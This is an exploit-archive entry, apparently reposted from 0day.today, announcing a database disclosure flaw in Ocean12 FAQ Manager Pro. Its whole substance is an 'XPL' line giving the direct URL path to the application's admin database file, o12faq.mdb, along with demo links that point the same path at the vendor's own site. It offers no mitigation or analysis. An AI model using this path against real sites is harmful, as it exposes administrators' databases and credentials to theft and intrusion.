id: 4283
date: 11/27/2008
title: Ocean12 FAQ Manager Pro Database Disclosure Vulnerability
author: Stack
cves: 

=========================================================
Ocean12 FAQ Manager Pro Database Disclosure Vulnerability
=========================================================


#########################################################
---------------------------------------------------------
Portal Name: Ocean12 FAQ Manager Pro
Author : Mountassif Moad
Vulnerability : Database Disclosure Vulnerability
---------------------------------------------------------
#########################################################
XPL :
http://site.com/path//admin/o12faq.mdb
Demo :
http://ocean12tech.com/products/faq/demo/
http://ocean12tech.com/products/faq/demo/admin/o12faq.mdb



#  0day.today [2023-03-25]  #